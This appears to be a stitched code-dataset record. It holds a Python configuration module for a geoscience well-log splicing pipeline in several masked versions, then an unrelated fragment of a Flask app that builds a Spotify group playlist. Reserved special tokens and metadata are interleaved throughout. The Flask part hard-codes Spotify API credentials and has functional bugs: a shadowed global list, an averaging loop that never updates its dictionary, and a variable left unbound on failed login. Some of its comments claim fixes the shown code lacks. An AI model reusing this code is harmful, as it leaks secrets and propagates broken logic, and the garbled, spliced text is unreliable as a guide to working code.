BUCKET_LAS_SPLICE = 'us-central1-lithos-dev-94beb3d4-bucket'
COMPOSER_FOLDER = 'data/logqc_landing'
TMP_FOLDER = 'data/tmp'
BUCKET_JOB = 'log_splice_tool_jobs'
BIGQUERY_DATASET_ID = 'urc_jobs'
BIGQUERY_TABLE_ID = 'jobs'
tpt_workflow_type = 'tpt'
logsplice_workflow_type = 'logsplice'
logqc_workflow_type = 'logqc'
geomech_workflow_type = 'geomech'
N_PROCESSORS = 16
MOVING_AVG_WINDOW_SIZE = 11
MISSING = -999.0
COL_DICT = {'cal': ['CAL', 'CALI', 'CALX', 'HCAL', 'TGS_CALX', 'RAW_CALX'],
'dtc': ['DT', 'DT24', 'DTC', 'TGS_DT', 'TGS_DTC', 'RAW_DT', 'RAW_DTC'],
'rdeep': ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90',
'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'], 'rhob': ['DEN',
'RHOB', 'RHOZ', 'ZDEN', 'ZDNC', 'TGS_RHOB', 'RAW_RHOB'], 'drho': [
'DRHO', 'HDRA', 'ZCOR'], 'gr': ['APC_GR_NRM', 'GAMM', 'GR', 'GR_R',
'GRR', 'SGR', 'SGRR', 'CGR'], 'nphil': ['CNCF', 'NEU', 'NPOR', 'NPHI',
'NPHIL', 'TNPH', 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'], 'pe': [
'PE', 'PEF', 'PEFZ', 'TGS_PE', 'RAW_PE']}
RDEEP_TYPE_LIST = ['rdeep_ltrl', 'rdeep_indct', 'rdeep_unknown']
RDEEP_TYPE_DICT = {'rdeep_ltrl': 1, 'rdeep_indct': 2, 'rdeep_unknown': 3}
CURVE_DESC = {'DEPT': 'Depth', 'CAL': 'Caliper', 'DRHO':
'Density Correction', 'DTC': 'Compressional Wave Slowness', 'DTS':
'Shear Wave Slowness', 'GR': 'Gamma Ray', 'NPHI': 'Neutron Porosity',
'NPHIL': 'Neutron Porosity', 'PE': 'Photoelectric Effect', 'RDEEP':
'Deep Resistivity', 'RDEEP_LTRL': 'Laterolog Resistivity',
'RDEEP_INDCT': 'Induction Resistivity', 'RDEEP_UNKNOWN':
'Unknown Resistivity (Laterolog or Induction)', 'RDEEP_TYPE':
'RDEEP Type 1:Laterolog 2:Induction 3:Unknown', 'RHOB': 'Bulk Density',
'RUGOSITY': 'Borehole Rugosity', 'RUGOSITY_BHF':
'Rugosity Bad Hole Flag', 'DRHO_BHF':
'Density Correction Bad Hole Flag', 'DTC_BHF': 'Sonic Bad Hole Flag',
'GR_BHF': 'Gamma Ray Bad Hole Flag', 'NPHIL_BHF':
'Neutron Bad Hole Flag', 'RHOB_BHF': 'Density Bad Hole Flag',
'LOG_RDEEP_BHF': 'Resistivity Bad Hole Flag', 'PE_BHF':
'PE Bad Hole Flag', 'RHOB_MCF': 'Density Corrected from Multiwell Flag',
'RHOB_SYN': 'Density Estimation from Ensemble of Learners', 'NPHI_MCF':
'Neutron Corrected from Multiwell Flag', 'NPHI_SYN':
'Neutron Estimation from Ensemble of Learners', 'DTC_MCF':
'Sonic Corrected from Multiwell Flag', 'DTC_SYN':
'Sonic Estimation from Ensemble of Learners', 'PE_MCF':
'PE Corrected from Multiwell Flag', 'PE_SYN':
'PE Estimation from Ensemble of Learners', 'RHOB_NCF':
'Density No Correction Flag', 'RHOB_CORR': 'Density Corrected',
'NPHI_NCF': 'Neutron No Correction Flag', 'NPHI_CORR':
'Neutron Corrected', 'DTC_NCF': 'Sonic No Correction Flag', 'DTC_CORR':
'Sonic Corrected', 'PE_NCF': 'PE No Correction Flag', 'PE_CORR':
'PE Corrected'}
<|reserved_special_token_1|>
PROJECT_ID = "aaet-geoscience-dev"
# The tmp folder is for lasio I/O purposes
DATA_PATH = "/home/airflow/gcs/data/tmp"
# Credential JSON key for accessing other projects
# CREDENTIALS_JSON = "gs://aaet_zexuan/flow/keys/composer_las_merge.json"
CREDENTIALS_JSON = "keys/composer_las_merge.json"
# Bucket name for merged las files and spliced las files
BUCKET_LAS_MERGE = "las_merged"
BUCKET_LAS_SPLICE = "us-central1-lithos-dev-94beb3d4-bucket"
# las_splice.py output to the composer data folder, as input of logqc
COMPOSER_FOLDER = "data/logqc_landing"
TMP_FOLDER = "data/tmp"
# for GCP web UI and Big Query Job Status Report
BUCKET_JOB = "log_splice_tool_jobs"
BIGQUERY_DATASET_ID = "urc_jobs"
BIGQUERY_TABLE_ID = "jobs"
# Workflow type
tpt_workflow_type = "tpt"
logsplice_workflow_type = "logsplice"
logqc_workflow_type = "logqc"
geomech_workflow_type = "geomech"
# Number of processors for las_merge_MP (multiprocessing).
N_PROCESSORS = 16
# The window size for moving average, e.g. 11 means the window covers a
# point and 5 adjacent points on both sides
MOVING_AVG_WINDOW_SIZE = 11
# Default value for missing data, usually it is either -999.25 or -999.0
MISSING = -999.0
# COL_DICT: a dictionary of aliased curve names for log splicing. keys correspond to measurements
# (e.g., 'density', 'gamma', 'resistivity', etc.),
# and each value is a list of aliased column names that could potentially correspond
# to those measurements. Each key is the aliased curve name before splicing,
# each key's value is the standard curve name after splicing.
COL_DICT = {
# Caliper
"cal": ["CAL", "CALI", "CALX", "HCAL", "TGS_CALX", "RAW_CALX"],
# Compressional Sonic Slowness
"dtc": ["DT", "DT24", "DTC", 'TGS_DT', "TGS_DTC", "RAW_DT", "RAW_DTC"],
# Deep Resistivity
# 'rdeep' includes 'rdeep_ltrl' (laterolog), 'rdeep_indct' (induction), 'rdeep_unknown'.
# A final 'rdeep' will be generated
# with an additional 'rdeep_type' curve to denote the log type.
"rdeep": ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90', 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'],
# Density (Bulk)
"rhob": ["DEN", "RHOB", "RHOZ", "ZDEN", "ZDNC", "TGS_RHOB", 'RAW_RHOB'],
# Density (Correction)
"drho": ["DRHO", "HDRA", "ZCOR"],
# Gamma Ray
"gr": ["APC_GR_NRM", "GAMM", "GR", "GR_R", "GRR", 'SGR', 'SGRR', 'CGR'],
# Neutron Porosity
"nphil": ["CNCF", "NEU", "NPOR", "NPHI", "NPHIL", "TNPH", 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'],
# Photoelectric effect
"pe": ["PE", "PEF", "PEFZ", 'TGS_PE', 'RAW_PE'],
}
# LDD is laterolog
# The rest are inductions
# RDEEP, RES, RES_DEEP are of unknown origin
# __log_type_rdeep = [log_type_enum.induction, #AHT90
# log_type_enum.induction, #AT90
# log_type_enum.induction, #ILD
# log_type_enum.induction, #ILT90
# log_type_enum.laterolog, #LLD
# log_type_enum.induction, #M2R9
# log_type_enum.unknown, #RDEEP
# log_type_enum.unknown, #RES
# log_type_enum.unknown] #RES_DEEP
RDEEP_TYPE_LIST = ["rdeep_ltrl", "rdeep_indct", "rdeep_unknown"]
RDEEP_TYPE_DICT = {"rdeep_ltrl": 1, "rdeep_indct": 2, "rdeep_unknown": 3}
# curve description dictionary
CURVE_DESC = {
"DEPT": "Depth",
"CAL": "Caliper",
"DRHO": "Density Correction",
"DTC": "Compressional Wave Slowness",
"DTS": "Shear Wave Slowness",
"GR": "Gamma Ray",
"NPHI": "Neutron Porosity",
"NPHIL": "Neutron Porosity",
"PE": "Photoelectric Effect",
"RDEEP": "Deep Resistivity",
"RDEEP_LTRL": "Laterolog Resistivity",
"RDEEP_INDCT": "Induction Resistivity",
"RDEEP_UNKNOWN": "Unknown Resistivity (Laterolog or Induction)",
"RDEEP_TYPE": "RDEEP Type 1:Laterolog 2:Induction 3:Unknown",
"RHOB": "Bulk Density",
"RUGOSITY": "Borehole Rugosity",
"RUGOSITY_BHF": "Rugosity Bad Hole Flag",
"DRHO_BHF": "Density Correction Bad Hole Flag",
"DTC_BHF": "Sonic Bad Hole Flag",
"GR_BHF": "Gamma Ray Bad Hole Flag",
"NPHIL_BHF": "Neutron Bad Hole Flag",
"RHOB_BHF": "Density Bad Hole Flag",
"LOG_RDEEP_BHF": "Resistivity Bad Hole Flag",
"PE_BHF": "PE Bad Hole Flag",
"RHOB_MCF": "Density Corrected from Multiwell Flag",
"RHOB_SYN": "Density Estimation from Ensemble of Learners",
"NPHI_MCF": "Neutron Corrected from Multiwell Flag",
"NPHI_SYN": "Neutron Estimation from Ensemble of Learners",
"DTC_MCF": "Sonic Corrected from Multiwell Flag",
"DTC_SYN": "Sonic Estimation from Ensemble of Learners",
"PE_MCF": "PE Corrected from Multiwell Flag",
"PE_SYN": "PE Estimation from Ensemble of Learners",
"RHOB_NCF": "Density No Correction Flag",
"RHOB_CORR": "Density Corrected",
"NPHI_NCF": "Neutron No Correction Flag",
"NPHI_CORR": "Neutron Corrected",
"DTC_NCF": "Sonic No Correction Flag",
"DTC_CORR": "Sonic Corrected",
"PE_NCF": "PE No Correction Flag",
"PE_CORR": "PE Corrected"
}
|
flexible
|
{
"blob_id": "0b2a036b806cca6e7f58008040b3a261a8bc844d",
"index": 4092,
"step-1": "<mask token>\n",
"step-2": "PROJECT_ID = 'aaet-geoscience-dev'\nDATA_PATH = '/home/airflow/gcs/data/tmp'\nCREDENTIALS_JSON = 'keys/composer_las_merge.json'\nBUCKET_LAS_MERGE = 'las_merged'\nBUCKET_LAS_SPLICE = 'us-central1-lithos-dev-94beb3d4-bucket'\nCOMPOSER_FOLDER = 'data/logqc_landing'\nTMP_FOLDER = 'data/tmp'\nBUCKET_JOB = 'log_splice_tool_jobs'\nBIGQUERY_DATASET_ID = 'urc_jobs'\nBIGQUERY_TABLE_ID = 'jobs'\ntpt_workflow_type = 'tpt'\nlogsplice_workflow_type = 'logsplice'\nlogqc_workflow_type = 'logqc'\ngeomech_workflow_type = 'geomech'\nN_PROCESSORS = 16\nMOVING_AVG_WINDOW_SIZE = 11\nMISSING = -999.0\nCOL_DICT = {'cal': ['CAL', 'CALI', 'CALX', 'HCAL', 'TGS_CALX', 'RAW_CALX'],\n 'dtc': ['DT', 'DT24', 'DTC', 'TGS_DT', 'TGS_DTC', 'RAW_DT', 'RAW_DTC'],\n 'rdeep': ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90',\n 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'], 'rhob': ['DEN',\n 'RHOB', 'RHOZ', 'ZDEN', 'ZDNC', 'TGS_RHOB', 'RAW_RHOB'], 'drho': [\n 'DRHO', 'HDRA', 'ZCOR'], 'gr': ['APC_GR_NRM', 'GAMM', 'GR', 'GR_R',\n 'GRR', 'SGR', 'SGRR', 'CGR'], 'nphil': ['CNCF', 'NEU', 'NPOR', 'NPHI',\n 'NPHIL', 'TNPH', 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'], 'pe': [\n 'PE', 'PEF', 'PEFZ', 'TGS_PE', 'RAW_PE']}\nRDEEP_TYPE_LIST = ['rdeep_ltrl', 'rdeep_indct', 'rdeep_unknown']\nRDEEP_TYPE_DICT = {'rdeep_ltrl': 1, 'rdeep_indct': 2, 'rdeep_unknown': 3}\nCURVE_DESC = {'DEPT': 'Depth', 'CAL': 'Caliper', 'DRHO':\n 'Density Correction', 'DTC': 'Compressional Wave Slowness', 'DTS':\n 'Shear Wave Slowness', 'GR': 'Gamma Ray', 'NPHI': 'Neutron Porosity',\n 'NPHIL': 'Neutron Porosity', 'PE': 'Photoelectric Effect', 'RDEEP':\n 'Deep Resistivity', 'RDEEP_LTRL': 'Laterolog Resistivity',\n 'RDEEP_INDCT': 'Induction Resistivity', 'RDEEP_UNKNOWN':\n 'Unknown Resistivity (Laterolog or Induction)', 'RDEEP_TYPE':\n 'RDEEP Type 1:Laterolog 2:Induction 3:Unknown', 'RHOB': 'Bulk Density',\n 'RUGOSITY': 'Borehole Rugosity', 'RUGOSITY_BHF':\n 'Rugosity Bad Hole Flag', 'DRHO_BHF':\n 'Density Correction 
Bad Hole Flag', 'DTC_BHF': 'Sonic Bad Hole Flag',\n 'GR_BHF': 'Gamma Ray Bad Hole Flag', 'NPHIL_BHF':\n 'Neutron Bad Hole Flag', 'RHOB_BHF': 'Density Bad Hole Flag',\n 'LOG_RDEEP_BHF': 'Resistivity Bad Hole Flag', 'PE_BHF':\n 'PE Bad Hole Flag', 'RHOB_MCF': 'Density Corrected from Multiwell Flag',\n 'RHOB_SYN': 'Density Estimation from Ensemble of Learners', 'NPHI_MCF':\n 'Neutron Corrected from Multiwell Flag', 'NPHI_SYN':\n 'Neutron Estimation from Ensemble of Learners', 'DTC_MCF':\n 'Sonic Corrected from Multiwell Flag', 'DTC_SYN':\n 'Sonic Estimation from Ensemble of Learners', 'PE_MCF':\n 'PE Corrected from Multiwell Flag', 'PE_SYN':\n 'PE Estimation from Ensemble of Learners', 'RHOB_NCF':\n 'Density No Correction Flag', 'RHOB_CORR': 'Density Corrected',\n 'NPHI_NCF': 'Neutron No Correction Flag', 'NPHI_CORR':\n 'Neutron Corrected', 'DTC_NCF': 'Sonic No Correction Flag', 'DTC_CORR':\n 'Sonic Corrected', 'PE_NCF': 'PE No Correction Flag', 'PE_CORR':\n 'PE Corrected'}\n",
"step-3": "PROJECT_ID = \"aaet-geoscience-dev\"\r\n# The tmp folder is for lasio I/O purposes\r\nDATA_PATH = \"/home/airflow/gcs/data/tmp\"\r\n\r\n# Credential JSON key for accessing other projects\r\n# CREDENTIALS_JSON = \"gs://aaet_zexuan/flow/keys/composer_las_merge.json\"\r\nCREDENTIALS_JSON = \"keys/composer_las_merge.json\"\r\n\r\n# Bucket name for merged las files and spliced las files\r\nBUCKET_LAS_MERGE = \"las_merged\"\r\nBUCKET_LAS_SPLICE = \"us-central1-lithos-dev-94beb3d4-bucket\"\r\n\r\n# las_splice.py output to the composer data folder, as input of logqc\r\nCOMPOSER_FOLDER = \"data/logqc_landing\"\r\nTMP_FOLDER = \"data/tmp\"\r\n# for GCP web UI and Big Query Job Status Report\r\nBUCKET_JOB = \"log_splice_tool_jobs\"\r\nBIGQUERY_DATASET_ID = \"urc_jobs\"\r\nBIGQUERY_TABLE_ID = \"jobs\"\r\n\r\n# Workflow type\r\ntpt_workflow_type = \"tpt\"\r\nlogsplice_workflow_type = \"logsplice\"\r\nlogqc_workflow_type = \"logqc\"\r\ngeomech_workflow_type = \"geomech\"\r\n\r\n# Number of processors for las_merge_MP (multiprocessing).\r\nN_PROCESSORS = 16\r\n\r\n# The window size for moving average, e.g. 11 means the window covers a\r\n# point and 5 adjacent points on both sides\r\nMOVING_AVG_WINDOW_SIZE = 11\r\n\r\n# Default value for missing data, usually it is either -999.25 or -999.0\r\nMISSING = -999.0\r\n\r\n# COL_DICT: a dictionary of aliased curve names for log splicing. keys correspond to measurements\r\n# (e.g., 'density', 'gamma', 'resistivity', etc.),\r\n# and each value is a list of aliased column names that could potentially correspond\r\n# to those measurements. 
Each key is the aliased curve name before splicing,\r\n# each key's value is the standard curve name after splicing.\r\nCOL_DICT = {\r\n # Caliper\r\n \"cal\": [\"CAL\", \"CALI\", \"CALX\", \"HCAL\", \"TGS_CALX\", \"RAW_CALX\"],\r\n # Compressional Sonic Slowness\r\n \"dtc\": [\"DT\", \"DT24\", \"DTC\", 'TGS_DT', \"TGS_DTC\", \"RAW_DT\", \"RAW_DTC\"],\r\n # Deep Resistivity\r\n # 'rdeep' includes 'rdeep_ltrl' (laterolog), 'rdeep_indct' (induction), 'rdeep_unknown'.\r\n # A final 'rdeep' will be generated\r\n # with an additional 'rdeep_type' curve to denote the log type.\r\n \"rdeep\": ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90', 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'],\r\n # Density (Bulk)\r\n \"rhob\": [\"DEN\", \"RHOB\", \"RHOZ\", \"ZDEN\", \"ZDNC\", \"TGS_RHOB\", 'RAW_RHOB'],\r\n # Density (Correction)\r\n \"drho\": [\"DRHO\", \"HDRA\", \"ZCOR\"],\r\n # Gamma Ray\r\n \"gr\": [\"APC_GR_NRM\", \"GAMM\", \"GR\", \"GR_R\", \"GRR\", 'SGR', 'SGRR', 'CGR'],\r\n # Neutron Porosity\r\n \"nphil\": [\"CNCF\", \"NEU\", \"NPOR\", \"NPHI\", \"NPHIL\", \"TNPH\", 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'],\r\n # Photoelectric effect\r\n \"pe\": [\"PE\", \"PEF\", \"PEFZ\", 'TGS_PE', 'RAW_PE'],\r\n}\r\n\r\n# LDD is laterolog\r\n# The rest are inductions\r\n# RDEEP, RES, RES_DEEP are of unknown origin\r\n# __log_type_rdeep = [log_type_enum.induction, #AHT90\r\n# log_type_enum.induction, #AT90\r\n# log_type_enum.induction, #ILD\r\n# log_type_enum.induction, #ILT90\r\n# log_type_enum.laterolog, #LLD\r\n# log_type_enum.induction, #M2R9\r\n# log_type_enum.unknown, #RDEEP\r\n# log_type_enum.unknown, #RES\r\n# log_type_enum.unknown] #RES_DEEP\r\n\r\nRDEEP_TYPE_LIST = [\"rdeep_ltrl\", \"rdeep_indct\", \"rdeep_unknown\"]\r\nRDEEP_TYPE_DICT = {\"rdeep_ltrl\": 1, \"rdeep_indct\": 2, \"rdeep_unknown\": 3}\r\n\r\n# curve description dictionary\r\nCURVE_DESC = {\r\n \"DEPT\": \"Depth\",\r\n \"CAL\": \"Caliper\",\r\n \"DRHO\": \"Density Correction\",\r\n \"DTC\": 
\"Compressional Wave Slowness\",\r\n \"DTS\": \"Shear Wave Slowness\",\r\n \"GR\": \"Gamma Ray\",\r\n \"NPHI\": \"Neutron Porosity\",\r\n \"NPHIL\": \"Neutron Porosity\",\r\n \"PE\": \"Photoelectric Effect\",\r\n \"RDEEP\": \"Deep Resistivity\",\r\n \"RDEEP_LTRL\": \"Laterolog Resistivity\",\r\n \"RDEEP_INDCT\": \"Induction Resistivity\",\r\n \"RDEEP_UNKNOWN\": \"Unknown Resistivity (Laterolog or Induction)\",\r\n \"RDEEP_TYPE\": \"RDEEP Type 1:Laterolog 2:Induction 3:Unknown\",\r\n \"RHOB\": \"Bulk Density\",\r\n \"RUGOSITY\": \"Borehole Rugosity\",\r\n \"RUGOSITY_BHF\": \"Rugosity Bad Hole Flag\",\r\n \"DRHO_BHF\": \"Density Correction Bad Hole Flag\",\r\n \"DTC_BHF\": \"Sonic Bad Hole Flag\",\r\n \"GR_BHF\": \"Gamma Ray Bad Hole Flag\",\r\n \"NPHIL_BHF\": \"Neutron Bad Hole Flag\",\r\n \"RHOB_BHF\": \"Density Bad Hole Flag\",\r\n \"LOG_RDEEP_BHF\": \"Resistivity Bad Hole Flag\",\r\n \"PE_BHF\": \"PE Bad Hole Flag\",\r\n \"RHOB_MCF\": \"Density Corrected from Multiwell Flag\",\r\n \"RHOB_SYN\": \"Density Estimation from Ensemble of Learners\",\r\n \"NPHI_MCF\": \"Neutron Corrected from Multiwell Flag\",\r\n \"NPHI_SYN\": \"Neutron Estimation from Ensemble of Learners\",\r\n \"DTC_MCF\": \"Sonic Corrected from Multiwell Flag\",\r\n \"DTC_SYN\": \"Sonic Estimation from Ensemble of Learners\",\r\n \"PE_MCF\": \"PE Corrected from Multiwell Flag\",\r\n \"PE_SYN\": \"PE Estimation from Ensemble of Learners\",\r\n \"RHOB_NCF\": \"Density No Correction Flag\",\r\n \"RHOB_CORR\": \"Density Corrected\",\r\n \"NPHI_NCF\": \"Neutron No Correction Flag\",\r\n \"NPHI_CORR\": \"Neutron Corrected\",\r\n \"DTC_NCF\": \"Sonic No Correction Flag\",\r\n \"DTC_CORR\": \"Sonic Corrected\",\r\n \"PE_NCF\": \"PE No Correction Flag\",\r\n \"PE_CORR\": \"PE Corrected\"\r\n}\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
@app.route('/tracks', methods=['POST'])
def get_user_tracks():
ids = json.loads(request.data)['ids']
tracks.extend(ids)
return 'success'
@app.route('/')
@login_required
def index():
username = session['username']
if session.get('token') and session.get('playlist_dict'):
group_playlist = gen_playlist(tracks)
sp = spotipy.Spotify(auth=session['token'])
playlist = sp.user_playlist_add_tracks(username, session[
'playlist_dict']['id'], group_playlist)
return render_template('index.html', playlist_url=session[
'playlist_dict']['uri'])
token = util.prompt_for_user_token(username,
'playlist-modify-public user-top-read', client_id=client_id,
client_secret=client_secret, redirect_uri='http://127.0.0.1')
if token:
session['token'] = token
sp = spotipy.Spotify(auth=token)
track_dict = sp.current_user_top_tracks(limit=20, offset=0,
time_range='medium_term')
tracks = list(map(lambda x: x['id'], track_dict['items']))
group_playlist = gen_playlist(tracks)
playlist_dict = sp.user_playlist_create(username, 'Group Playlist')
playlist_id = playlist_dict['id']
user = playlist_dict['owner']
playlist = sp.user_playlist_add_tracks(username, playlist_id,
group_playlist)
else:
print("Can't get token for " + username)
url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']
session['playlist_url'] = playlist_dict['uri']
return render_template('index.html', playlist_url=url)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
tracks = []
if request.method == 'POST':
if request.form.get('username'):
session['username'] = request.form.get('username')
return redirect('/')
else:
return render_template('login.html')
<|reserved_special_token_0|>
def gen_playlist(track_ids):
client_credentials_manager = SpotifyClientCredentials(client_id,
client_secret)
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,
'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness':
0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,
'tempo': 0.0}
song_counter = 0.0
for song in track_ids:
song_counter += 1
features = sp.audio_features(tracks=[song])
for key, value in features[0].items():
if isinstance(value, float):
total_features[key] += value
if song_counter > 0:
for key, value in total_features.items():
value /= song_counter
song_list = []
for song in track_ids:
score = compare_score(song, total_features, sp.audio_features(
tracks=[song]))
song_list.append((song, score))
song_list = sorted(song_list, key=lambda x: x[1])
if len(song_list) > 20:
song_list = song_list[:20]
song_list = [song_list[i][0] for i in range(len(song_list))]
return song_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if app.config['DEBUG']:
@app.after_request
def after_request(response):
response.headers['Cache-Control'
] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_0|>
Session(app)
<|reserved_special_token_0|>
@app.route('/tracks', methods=['POST'])
def get_user_tracks():
ids = json.loads(request.data)['ids']
tracks.extend(ids)
return 'success'
@app.route('/')
@login_required
def index():
username = session['username']
if session.get('token') and session.get('playlist_dict'):
group_playlist = gen_playlist(tracks)
sp = spotipy.Spotify(auth=session['token'])
playlist = sp.user_playlist_add_tracks(username, session[
'playlist_dict']['id'], group_playlist)
return render_template('index.html', playlist_url=session[
'playlist_dict']['uri'])
token = util.prompt_for_user_token(username,
'playlist-modify-public user-top-read', client_id=client_id,
client_secret=client_secret, redirect_uri='http://127.0.0.1')
if token:
session['token'] = token
sp = spotipy.Spotify(auth=token)
track_dict = sp.current_user_top_tracks(limit=20, offset=0,
time_range='medium_term')
tracks = list(map(lambda x: x['id'], track_dict['items']))
group_playlist = gen_playlist(tracks)
playlist_dict = sp.user_playlist_create(username, 'Group Playlist')
playlist_id = playlist_dict['id']
user = playlist_dict['owner']
playlist = sp.user_playlist_add_tracks(username, playlist_id,
group_playlist)
else:
print("Can't get token for " + username)
url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']
session['playlist_url'] = playlist_dict['uri']
return render_template('index.html', playlist_url=url)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
tracks = []
if request.method == 'POST':
if request.form.get('username'):
session['username'] = request.form.get('username')
return redirect('/')
else:
return render_template('login.html')
def compare_score(song, total_features, features):
score = 0.0
for key, value in features[0].items():
if isinstance(value, float):
score += value * 1.0 / (1.0 * (total_features[key] + value))
return score
def gen_playlist(track_ids):
client_credentials_manager = SpotifyClientCredentials(client_id,
client_secret)
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,
'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness':
0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,
'tempo': 0.0}
song_counter = 0.0
for song in track_ids:
song_counter += 1
features = sp.audio_features(tracks=[song])
for key, value in features[0].items():
if isinstance(value, float):
total_features[key] += value
if song_counter > 0:
for key, value in total_features.items():
value /= song_counter
song_list = []
for song in track_ids:
score = compare_score(song, total_features, sp.audio_features(
tracks=[song]))
song_list.append((song, score))
song_list = sorted(song_list, key=lambda x: x[1])
if len(song_list) > 20:
song_list = song_list[:20]
song_list = [song_list[i][0] for i in range(len(song_list))]
return song_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
# Configure the Flask application.
app = Flask(__name__)
# NOTE(review): Spotify API credentials are hard-coded in source; they
# should be moved to environment variables before publishing.
client_id = '320606726d354474b5da64233babe82d'
client_secret = 'f2d15a0b056343cfa094525adfc45f27'
# In debug mode, disable client-side caching so edits show up immediately.
if app.config['DEBUG']:
    @app.after_request
    def after_request(response):
        response.headers['Cache-Control'
            ] = 'no-cache, no-store, must-revalidate'
        response.headers['Expires'] = 0
        response.headers['Pragma'] = 'no-cache'
        return response
# Store sessions on the filesystem (temp dir) instead of signed cookies.
app.config['SESSION_FILE_DIR'] = mkdtemp()
app.config['SESSION_PERMANENT'] = False
app.config['SESSION_TYPE'] = 'filesystem'
Session(app)
# Track ids pooled from all connected users (module-level, shared).
tracks = []
@app.route('/tracks', methods=['POST'])
def get_user_tracks():
    """Append a newly connected user's POSTed track ids to the shared pool."""
    payload = json.loads(request.data)
    tracks.extend(payload['ids'])
    return 'success'
@app.route('/')
@login_required
def index():
    """Create (or top up) the group playlist and render it embedded.

    Fast path: when the host already has a token and a playlist in the
    session, just add the pooled tracks to it. Otherwise authorise the
    host, seed the pool with their top tracks, and create the playlist.
    """
    username = session['username']
    if session.get('token') and session.get('playlist_dict'):
        group_playlist = gen_playlist(tracks)
        sp = spotipy.Spotify(auth=session['token'])
        sp.user_playlist_add_tracks(username, session['playlist_dict'][
            'id'], group_playlist)
        return render_template('index.html', playlist_url=session[
            'playlist_dict']['uri'])
    token = util.prompt_for_user_token(username,
        'playlist-modify-public user-top-read', client_id=client_id,
        client_secret=client_secret, redirect_uri='http://127.0.0.1')
    if not token:
        # BUG FIX: the original fell through and crashed on an unbound
        # playlist_dict (NameError); send the user back to the login page.
        print("Can't get token for " + username)
        return redirect('/login')
    session['token'] = token
    sp = spotipy.Spotify(auth=token)
    track_dict = sp.current_user_top_tracks(limit=20, offset=0,
        time_range='medium_term')
    # BUG FIX: the original assigned to `tracks`, making it local to this
    # function and breaking the gen_playlist(tracks) call above with
    # UnboundLocalError; use a distinct name for the host's own tracks.
    host_tracks = [item['id'] for item in track_dict['items']]
    group_playlist = gen_playlist(host_tracks)
    playlist_dict = sp.user_playlist_create(username, 'Group Playlist')
    sp.user_playlist_add_tracks(username, playlist_dict['id'], group_playlist)
    # Remember the playlist so later requests take the fast path above.
    session['playlist_dict'] = playlist_dict
    url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']
    session['playlist_url'] = playlist_dict['uri']
    return render_template('index.html', playlist_url=url)
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Log user in.

    GET shows the form; POST stores the submitted username in the session
    (when present) and redirects to the index either way.
    """
    session.clear()
    # NOTE(review): this rebinds a local name only; the module-level
    # `tracks` list is not cleared here.
    tracks = []
    if request.method == 'POST':
        if request.form.get('username'):
            session['username'] = request.form.get('username')
        # Redirect even when no username was submitted.
        return redirect('/')
    else:
        return render_template('login.html')
def compare_score(song, total_features, features):
    """Return a similarity score between one track's audio features and the
    aggregated totals; lower means closer (``song`` is unused).
    """
    score = 0.0
    # features is the one-element list returned by sp.audio_features().
    for key, value in features[0].items():
        # Only float-valued audio features contribute to the score.
        if isinstance(value, float):
            score += value * 1.0 / (1.0 * (total_features[key] + value))
    return score
def gen_playlist(track_ids):
    """Return up to 20 track ids whose audio features are closest to the
    group's average feature profile (lower compare_score = closer).
    """
    client_credentials_manager = SpotifyClientCredentials(client_id,
        client_secret)
    sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
    total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,
        'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness':
        0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,
        'tempo': 0.0}
    song_counter = 0.0
    # Fetch each track's audio features once and cache them; the original
    # re-queried the API a second time while scoring.
    features_cache = {}
    for song in track_ids:
        song_counter += 1
        features = sp.audio_features(tracks=[song])
        features_cache[song] = features
        for key, value in features[0].items():
            if isinstance(value, float):
                total_features[key] += value
    # Average the aggregated features. BUG FIX: the original divided the
    # loop *variable* (`value /= song_counter`), which never wrote back
    # into the dict, so no averaging actually happened.
    if song_counter > 0:
        for key in total_features:
            total_features[key] /= song_counter
    # Score every track against the averaged profile and keep the 20 closest.
    song_list = []
    for song in track_ids:
        score = compare_score(song, total_features, features_cache[song])
        song_list.append((song, score))
    song_list = sorted(song_list, key=lambda x: x[1])
    if len(song_list) > 20:
        song_list = song_list[:20]
    song_list = [song_list[i][0] for i in range(len(song_list))]
    return song_list
<|reserved_special_token_1|>
import json
import spotipy
import spotipy.util as util
